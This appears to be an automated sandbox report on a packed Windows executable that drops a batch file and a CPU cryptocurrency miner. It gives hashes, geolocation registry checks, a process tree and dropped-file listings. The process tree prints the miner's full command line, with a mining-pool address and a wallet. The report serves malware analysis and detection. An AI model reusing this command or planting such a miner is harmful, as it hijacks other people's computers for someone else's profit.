73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2320	b2e.exe
4820	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4820	cpuminer-sse2.exe
4820	cpuminer-sse2.exe
4820	cpuminer-sse2.exe
4820	cpuminer-sse2.exe
4820	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4208-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4208 wrote to memory of 2320	4208	batexe.exe	89
PID 4208 wrote to memory of 2320	4208	batexe.exe	89
PID 4208 wrote to memory of 2320	4208	batexe.exe	89
PID 2320 wrote to memory of 2476	2320	b2e.exe	90
PID 2320 wrote to memory of 2476	2320	b2e.exe	90
PID 2320 wrote to memory of 2476	2320	b2e.exe	90
PID 2476 wrote to memory of 4820	2476	cmd.exe	93
PID 2476 wrote to memory of 4820	2476	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4208
- C:\Users\Admin\AppData\Local\Temp\8879.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8879.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8879.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8B58.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8879.tmp\b2e.exe

Filesize
2.3MB

MD5
811a07cb074c83e809ebd8cf3fc1aae5

SHA1
b4e218394d6ee079ba467019f5af941647804c9f

SHA256
47af9910ec5d4302782217af9f5bfa8c19402e43ab2455641e8d06861b807876

SHA512
8d19d79deeb8fac0820198b8a5f8b36219ddff4bb0d6dd95d517bb4e8cc89530a1290515dae16fb52ccfed7eecb259eb10d9edf79b258899e4fbf15b6652d63b

Download Submit
C:\Users\Admin\AppData\Local\Temp\8879.tmp\b2e.exe

Filesize
379KB

MD5
53f3fee59dba0084a21d598451f10185

SHA1
a62925f34de3b956fe9c5ebd848d438b3da314d7

SHA256
8b12127136ec112c58e8701e407e7bb5625457eb384eb2f1f3720582160c5a47

SHA512
5f570b18be644371a46a792b4f5dd70508dd1db3035c8cadd11ad43d90e995969a375ba960cf8ff6212384f3dcc44a094c1c7893331edc633bdb7ebe21d91fc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\8879.tmp\b2e.exe

Filesize
267KB

MD5
e22c98a6d2bf1e9913ed74fd43d2fc0b

SHA1
9c86de738f505ca67c1a4c42d8f46e8cd543f059

SHA256
25aac988092f819f4ff1c157f4eb8debabe133b4c566c96f86d443334ea4bb35

SHA512
bf1c8b9b8cc94fbbc53963df594311ea91c324b109ab88597c1184173b87e114051258522f578318c49b14ddf50aa21d571f97fa8c47be42bc348d1b321eac31

Download Submit
C:\Users\Admin\AppData\Local\Temp\8B58.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
d0a14ead92e9a49254441a79f5365f8d

SHA1
9e582a74a7e0e63b12888d3cbaa139fdbb78dd11

SHA256
e691a4f964d86ab08dd21f14dd49eb9c777e817646ef127ae58e118c7c207d1e

SHA512
2c30c0106449d1242d16226bb702942ae5e8dfb72f0c42958bec4b8ed48db1054f0b2fa091f3f58568a6952e4a266c3fe8de22ddfc722540217aa89755d9be21

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
986KB

MD5
f4ffa53c8e180ac3a852c20f138e79e3

SHA1
14646da1ec3ca613aa5b09d1ce48986da6ace21e

SHA256
92e79dfd1cda6cd4f130b1ea3bd7e441f1025da50f0e53bb608c6558be70b198

SHA512
96652442a4df7aead95e04f33a240a33f8d8125276714c375050f63441c9d2a6fbe0094fa34fac9ccf33f9a52a4c9ed7e709243097af8477ee4dc8ea39fe1285

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
757KB

MD5
66732607b5859e1965f93b81886f6437

SHA1
e7d27e35c9e0b27d3d9c06414c6834b6785084b2

SHA256
817de1bc7a23bc5e48a6d9a9315d5286aacbd41674c6dd987b9185915c5bb9f0

SHA512
fd72bed81eaaeb0024b04d89310cc2c3a9322be811e5c2b9420efff20206ef0fbc1f96b5e94a98f28acbc55eb81a54bcdd9ab9123e785e29834e12a025ca2131

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1001KB

MD5
11a1eec86990b98617938eab04fa3369

SHA1
0ec375618fe293f464e6b9bf4cb30da0b5e9b9fd

SHA256
e7ca7f98c105a48816c78ede4793f30c48852e60b5fbd30a401d2435d27c2c77

SHA512
76d0662046490b924617c0bb9ca8bfb545885f48d0cc53cad9a1fe4c80318919838e88e7abfa7ca5850da0e4a97c71b3d62d620a6be885fb7ff2e3d4627851fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
666KB

MD5
2706cc8d41a012662eee389eba10ad17

SHA1
04882dbeaa57a4b8e87d613de61762e275cd6624

SHA256
6412131d705203939733bebf727de5b5fe698959252c998a41bd21c46de0d378

SHA512
c8357a7695002b01e72e01d9f10cc853c275880e212beab78a354459cd6dcd6dc1651a922959395daa837453d88d0c8ed8ad049b626f26c05c31bcae6bcb5ebd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
8f95148feac3bf0ef49c216ebfdecd2d

SHA1
749c274a64b421ee18b532ce42f1f0677ad66064

SHA256
424b2f27acc54cdb2ea029261d49c4855c90b7c969bf9659b2313c5a37a63dc7

SHA512
b8eb9d62ddd23555197e0b042da6907fb8e5eb3b32aa3609872ff0422f8a847baff4816cddb12745dcb69910c7257c26747d26f7d1bbd69c688eadbb4a6eb660

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
934KB

MD5
f0e1984f9636550ff9152afdd028803e

SHA1
a0e80d94d85af879c9ca902f4095a6bd53eb461e

SHA256
6f6ab4fc7a34bb536b639145498f39ff774c26f85e67ccf44800e53101f86681

SHA512
9728fdebe82f2334beb6d29c409a83f2408f26a95f532be6a7feab08f1207febce4b83b6c2cbd9f73b11b08b2a3f53345fc91c6054139ee0e6d9a9d1ccad41d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2320-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2320-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4208-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4820-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4820-46-0x0000000053A80000-0x0000000053B18000-memory.dmp

Filesize
608KB

Download
memory/4820-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4820-47-0x0000000001020000-0x00000000028D5000-memory.dmp

Filesize
24.7MB

Download
memory/4820-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4820-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download